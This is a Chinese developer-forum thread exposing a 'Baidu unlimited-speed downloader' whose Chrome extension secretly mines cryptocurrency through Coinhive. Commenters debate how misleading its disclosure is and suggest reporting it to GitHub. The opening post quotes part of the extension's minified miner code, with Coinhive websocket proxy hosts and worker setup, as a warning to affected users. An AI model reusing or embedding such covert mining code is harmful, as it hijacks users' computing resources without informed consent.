这是一个创建于 2453 天前的主题,其中的信息可能已经有所发展或是发生改变。
最近有朋友告诉我自己电脑时常连接 coinhive 不知道为什么,一排查发现是这哥们安装了所谓「百度不限速下载器」
这是一款通过算法来提速的高速下载器,支持 Windows 和 Mac。 请在官方地址下载,本程序不会获取您的任何隐私,绝对无毒,请放心使用。 本软件将持续更新,目标是打造一个最好用的高速下载器。
插件会占用不到 5%的 CPU (不会占用显卡)用于提高算力
实际上这东西就是用 Chrome 拓展执行 coinhive 挖矿,然后本地程序大概是打包了一个 aria2 和大概类似 BaiduExporter 的 Electron 程序。
拓展后台运行:
var q = navigator.hardwareConcurrency || 4;
H = d.threads || q,
function() {
return void 0 !== window.WebAssembly
}() && d.forceASMJS, S = Z, v = b;
var $ = "ifExclusiveTab",
ll = "forceMultiTab",
dl = "forceExclusiveTab",
Zl = function(l) {
return (window.URL || window.webkitURL || window.mozURL).createObjectURL(new Blob([l]))
}(m.default),
bl = {
LIB_URL: "https://coinhive.com/lib/",
ASMJS_NAME: "worker-asmjs.min.js",
REQUIRES_AUTH: !1,
WEBSOCKET_SHARDS: [
["wss://ws001.coinhive.com/proxy", "wss://ws002.coinhive.com/proxy", "wss://ws003.coinhive.com/proxy", "wss://ws004.coinhive.com/proxy", "wss://ws005.coinhive.com/proxy", "wss://ws006.coinhive.com/proxy", "wss://ws007.coinhive.com/proxy", "wss://ws029.coinhive.com/proxy"],
["wss://ws008.coinhive.com/proxy", "wss://ws009.coinhive.com/proxy", "wss://ws010.coinhive.com/proxy", "wss://ws011.coinhive.com/proxy", "wss://ws012.coinhive.com/proxy", "wss://ws013.coinhive.com/proxy", "wss://ws014.coinhive.com/proxy", "wss://ws030.coinhive.com/proxy"],
["wss://ws015.coinhive.com/proxy", "wss://ws016.coinhive.com/proxy", "wss://ws017.coinhive.com/proxy", "wss://ws018.coinhive.com/proxy", "wss://ws019.coinhive.com/proxy", "wss://ws020.coinhive.com/proxy", "wss://ws021.coinhive.com/proxy", "wss://ws031.coinhive.com/proxy"],
["wss://ws022.coinhive.com/proxy", "wss://ws023.coinhive.com/proxy", "wss://ws024.coinhive.com/proxy", "wss://ws025.coinhive.com/proxy", "wss://ws026.coinhive.com/proxy", "wss://ws027.coinhive.com/proxy", "wss://ws028.coinhive.com/proxy", "wss://ws032.coinhive.com/proxy"]
],
CAPTCHA_URL: "https://coinhive.com/captcha/",
MINER_URL: "https://coinhive.com/media/miner.html",
AUTH_URL: "https://authedmine.com/authenticate.html"
},
Vl = function() {
this.worker = new Worker(Zl), this.worker.onmessage = this.onReady.bind(this), this.currentJob = null, this.verifyJob = null, this.jobCallback = function() {}, this.verifyCallback = function() {}, this._isReady = !1, this.hashesPerSecond = 0, this.hashesTotal = 0, this.running = !1, this.lastMessageTimestamp = Date.now()
}
完整: https://gist.github.com/anonymous/1774ff85f84d07fdbeaefef44a236d34
本地程序结构:
├── dist-assets
│ ├── aria2.conf
│ ├── aria2.session
│ ├── aria2c
│ └── aria2c.exe
├── init.js
├── lib
│ ├── main.js
│ └── page
│ ├── index.css
│ ├── index.html
│ └── index.js
└── package.json
https://www.jianshu.com/p/075692b9feab
https://github.com/high-speed-downloader/high-speed-downloader
就这玩意儿有 800 多个 Star,其中一个现已匿名的维护者有将近 700 个 follower。
匿名的维护者八成之前还是个 vim 圈稍有点名气的人,因为被「依云」啊,「 mattn 」啊等人关注 。而且八成也可能逛 V 站,follower 里有看到不少 V 友
中枪的朋友赶紧清理了吧 - -
后台占用小量 CPU 挖矿并不可耻,明说就好,愿意的人自然会愿意。 但是藏着代码骗不懂的人真的挺可耻的。
 |
1
lScarlet 2018-03-02 19:49:55 +08:00 via Android
马克😏
|
 |
2
zcbenz 2018-03-02 20:00:31 +08:00 via iPhone  1
建议把这个项目向 GitHub 官方举报,这种恶意代码已经涉嫌违反用户协议了。
|
 |
4
feverzsj 2018-03-02 20:03:05 +08:00 1
这些人做的勾当就像小电影开场的澳门博彩一样
|
 |
5
miyuki 2018-03-02 20:03:30 +08:00
插件会占用不到 5%的 CPU (不会占用显卡)用于提高算力
我觉得还是说明白点比较好 |
 |
6
prolic 2018-03-02 20:10:09 +08:00 via Android 1
提高(我的分布式矿机)算力
|
 |
7
chroming 2018-03-02 20:26:30 +08:00 via Android
竟然置顶了
|
 |
9
madNeal 2018-03-02 21:26:18 +08:00 via Android
那个外卖红包的也有挖矿的吧
|
 |
10
discrete 2018-03-02 21:56:39 +08:00
项目 README 不是写明了吗,最后一段。
|
 |
11
XiaolinLeo 2018-03-02 22:03:13 +08:00 via iPhone
插件会占用不到 5%的 CPU (不会占用显卡)用于提高算力,用户可以自行对比打开插件和关闭插件后 CPU 占用率以及其他各项性能的差别,折合成经济成本,每人每天不到 1 分钱,一个月不到 3 角钱,收益将用于项目维持,不会对个人电脑造成任何的损害,不用时关闭插件即可。特别再次申明,在该项目创立之初,作者几经权衡之后,出于互利共赢的考虑,还是在软件付费、商业广告和占用一点空闲的 CPU 之间选择了后者,如果对此特别介意的用户,请绕行。
|
 |
14
nolan1864 2018-03-02 22:28:06 +08:00 1
@discrete
@XiaolinLeo 开头:这是一款通过算法来提速的高速下载器,支持 Windows 和 Mac。 结尾:插件会占用不到 5%的 CPU (不会占用显卡)用于提高算力 这个 5%他意思是说为了提高下载速度吧,没说是给他挖矿吧,这么明显的误导文字有什么好洗的。 |
 |
15
cszhiyue 2018-03-02 22:43:12 +08:00
这种实际上并没有开源的。还求 star 是一种什么心理?
|
 |
16
noahziheng 2018-03-02 23:42:30 +08:00 via Android
表示十分可怕,貌似楼主提到的匿名作者并不是匿名,貌似是 GitHub 系统的非法 E-mail 帐户...
因为那个帐户的活动记录一直到 1969 年...那时候 Github 显然还不存在...而 UNIX 时间戳向前最早就是到 1970 年,正好...这玩意显然只能从系统层面配置成这样,大概就是注册时间为 0 吧... 至于那些 Follower...大概是发现这个账户之后跟着玩的... |
 |
17
ynyounuo OP |
 |
18
zuolan 2018-03-03 07:45:44 +08:00 via Android
@noahziheng 这种匿名账号是怎么存在的?
|
|
19
noahziheng 2018-03-03 11:05:25 +08:00 via Android
@zuolan 看起来像是官方预置进去的或者是 web 端实现的时候的如果信息不正确就显示的默认值
|
|
20
noahziheng 2018-03-03 11:06:33 +08:00 via Android
@ynyounuo 故意的可能性比较大,想用这种方式匿名,后来才注册了那个项目名的账号
|
 |
21
scofieldpeng 2018-03-03 11:22:03 +08:00
这个 APP 中招的应该很多,之前下载某个镜像,受制于国内环境,居然只有百毒盘有,没办法搞了一个按小时收费的 VIP,然后淘宝卖家极力推荐我用这个不限速,我一看,这特么把我当猴耍呢,于是把挖矿脚本删除了再用的,实际发现并没有卵用的提速,最后还是换回了百毒官方客户端。这东西估计骗到了不少小白用户。。。
|
 |
22
LeungJZ 2018-03-03 11:32:39 +08:00
为啥不用 油猴 + IDM( MAC 可以用 PDM)
|
|
24
ynyounuo OP @scofieldpeng 哇,把这个卖家晒出来呗。现在这些黑产都成系统的啊。
|
 |
25
whwq2012 2018-03-03 17:38:39 +08:00
没挖过矿,如果真的只在使用的时候占用 5%cpu,即开即用的话,那可以理解。
|
 |
26
yyn618 2018-03-04 08:10:17 +08:00 via Android
之前用过一段时间 表示一眼看懂没什么可误解的? 不过用不到 油猴插件完全能解决哇
|
|
27
ynyounuo OP |
 |
28
woyaojizhu8 2018-03-04 22:16:48 +08:00
在这险恶的世道,跟其他相比,这确实能算明说了
|
 |
29
vodo 2018-03-22 16:03:36 +08:00
唉,,,
|
Select Language